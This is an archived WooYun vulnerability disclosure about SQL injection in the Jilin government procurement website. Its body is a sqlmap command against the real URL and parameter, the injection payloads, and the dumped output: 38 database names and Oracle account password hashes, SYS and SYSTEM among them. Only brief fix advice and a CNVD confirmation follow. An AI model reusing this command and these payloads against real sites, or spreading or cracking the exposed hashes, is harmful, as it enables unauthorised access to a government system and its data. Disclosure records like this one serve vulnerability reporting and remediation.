乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-28: 细节已通知厂商并且等待厂商处理中 2014-05-02: 厂商已经确认,细节仅向厂商公开 2014-05-12: 细节向核心白帽子及相关领域专家公开 2014-05-22: 细节向普通白帽子公开 2014-06-01: 细节向实习白帽子公开 2014-06-12: 细节向公众公开
吉林政府采购网存在sql注射漏洞,同服务器下存在多站点使用同一cms,导致也可以SQL注射。
1.sql注射点
sqlmap -u "www.ccgp-jilin.gov.cn/cgzxdtdetail.jsp?tablename=cgnr&condition=176868&articleid=10000245009" -p "condition" -b -v 2Place: GETParameter: condition Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tablename=cgnr&condition=176868' AND 3768=3768 AND 'qeIx'='qeIx&articleid=10000245009 Vector: AND [INFERENCE] Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: tablename=cgnr&condition=176868' AND 6881=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(103)||CHR(117)||CHR(109)||CHR(113)||(SELECT (CASE WHEN (6881=6881) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(116)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'AUjh'='AUjh&articleid=10000245009 Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)---web application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oracle
2.数据库库名
available databases [38]:[*] AGENCY[*] CMSAPP[*] CPMS[*] CTXSYS[*] DBSNMP[*] DF[*] DMSYS[*] EXFSYS[*] EXPERT[*] EXPERT_EPS[*] EXPERT_EPS_TEST[*] EXPERT_EPS_V2[*] EXPERT_EPS_V3[*] EXPERT_EPS_ZJ[*] EXPERT_R1[*] EXPERT_TEST[*] MM[*] OA[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PERFSTAT[*] SERSUB[*] SMS[*] SSADMIN[*] SUREKAM[*] SYS[*] SYSMAN[*] SYSTEM[*] TRSWCM65[*] TRSWCM65PLUG[*] TSMSYS[*] TURBOCMS[*] U1[*] WCM[*] WMSYS[*] XDB
3.数据库密码
database management system users password hashes:[*] _NEXT_USER [1]: password hash: NULL[*] AGENCY [1]: password hash: CCAABCF8343A8E86[*] ANONYMOUS [1]: password hash: anonymous[*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL[*] AQ_USER_ROLE [1]: password hash: NULL[*] AUTHENTICATEDUSER [1]: password hash: NULL[*] CMSAPP [1]: password hash: E1BF2337B07F4456[*] CONNECT [1]: password hash: NULL[*] CPMS [1]: password hash: 44995D03948B3E9B[*] CTXAPP [1]: password hash: NULL[*] CTXSYS [1]: password hash: 71E687F036AD56E5[*] DBA [1]: password hash: NULL[*] DBSNMP [1]: password hash: 54598AC2DBEE30A0[*] DBSPI [1]: password hash: AF10C4747F52706A[*] DELETE_CATALOG_ROLE [1]: password hash: NULL[*] DF [1]: password hash: E31EBE8B97155D1A[*] DIP [1]: password hash: CE4A36B8E06CA59C[*] DMSYS [1]: password hash: BFBA5A553FD9E28A[*] EJBCLIENT [1]: password hash: NULL[*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL[*] EXFSYS [1]: password hash: 66F4EF5650C20355[*] EXP_FULL_DATABASE [1]: password hash: NULL[*] EXPERT [1]: password hash: B3219F8DCD054435[*] EXPERT_EPS [1]: password hash: BDB2EE89FA364892[*] EXPERT_EPS_TEST [1]: password hash: 56060368E526D666[*] EXPERT_EPS_V2 [1]: password hash: 2B6CC459F263B5D1[*] EXPERT_EPS_V3 [1]: password hash: C5C1A2D7312A552E[*] EXPERT_EPS_ZJ [1]: password hash: FEC8D7B2B9B35E54[*] EXPERT_R1 [1]: password hash: 18A2B4CA64610A86[*] EXPERT_TEST [1]: password hash: 4EC8F00290837F9A[*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL[*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL[*] HS_ADMIN_ROLE [1]: password hash: NULL[*] IMP_FULL_DATABASE [1]: password hash: NULL[*] JAVA_ADMIN [1]: password hash: NULL[*] JAVA_DEPLOY [1]: password hash: NULL[*] JAVADEBUGPRIV [1]: password hash: NULL[*] JAVAIDPRIV [1]: password hash: NULL[*] JAVASYSPRIV [1]: password hash: NULL[*] JAVAUSERPRIV [1]: password hash: NULL[*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL[*] MDDATA [1]: password hash: DF02A496267DEE66[*] MDSYS [1]: password hash: 72979A94BAD2AF80[*] MGMT_USER [1]: password hash: NULL[*] MGMT_VIEW [1]: password hash: 28D49618FAED282F[*] MM [1]: password hash: D8FA6AC673D38C52[*] MONITORUSER [1]: password hash: CE9B2FAEA51AE0B1[*] NAGIOS [1]: password hash: 51E5F2198A83522F[*] OA [1]: password hash: 33B535DACAB22AEB[*] OEM_ADVISOR [1]: password hash: NULL[*] OEM_MONITOR [1]: password hash: NULL[*] OLAP_DBA [1]: password hash: NULL[*] OLAP_USER [1]: password hash: NULL[*] OLAPSYS [1]: password hash: 3FB8EF9DB538647C[*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00[*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F[*] OUTLN [1]: password hash: 4A3BA55E08595C81[*] PERFSTAT [1]: password hash: AC98877DE1297365[*] PUBLIC [1]: password hash: NULL[*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL[*] RESOURCE [1]: password hash: NULL[*] SCHEDULER_ADMIN [1]: password hash: NULL[*] SELECT_CATALOG_ROLE [1]: password hash: NULL[*] SERSUB [1]: password hash: 2853F9311C483DE8[*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3[*] SMS [1]: password hash: 23C574F5509AEC3A[*] SSADMIN [1]: password hash: 8A5D94EA2449ACB4[*] SUREKAM [1]: password hash: 2B304C0F3D5CB702[*] SYS [1]: password hash: 70E22C23FECE2FA7[*] SYSMAN [1]: password hash: 672A0C8EFE8F6F72[*] SYSTEM [1]: password hash: 2D594E86F93B17A1[*] TRSWCM65 [1]: password hash: EAA04A47E6357E1E[*] TRSWCM65PLUG [1]: password hash: 4DC109070BDD2E01[*] TSMSYS [1]: password hash: 3DF26A8B17D0F29F[*] TTT [1]: password hash: 139847AF52F14D52[*] TURBOCMS [1]: password hash: EEC9AD6A8D4F8011[*] U1 [1]: password hash: 13C53D92E4E5B01E[*] WCM [1]: password hash: 823FB932BA363E7D[*] WM_ADMIN_ROLE [1]: password hash: NULL[*] WMSYS [1]: password hash: 7C9BA362F8314299[*] XDB [1]: password hash: 88D8364765FCE6AF[*] XDBADMIN [1]: password hash: NULL[*] XDBWEBSERVICES [1]: password hash: NULL[*] ZJJGTEST [1]: password hash: 889C42D9E9AA268B
1.修复注入点2.假如已经没用此系统,关闭此服务
危害等级:高
漏洞Rank:13
确认时间:2014-05-02 21:27
CNVD确认并复现所述情况,转由CNCERT下发给吉林分中心处置,按信息泄露风险评分,rank 13
暂无
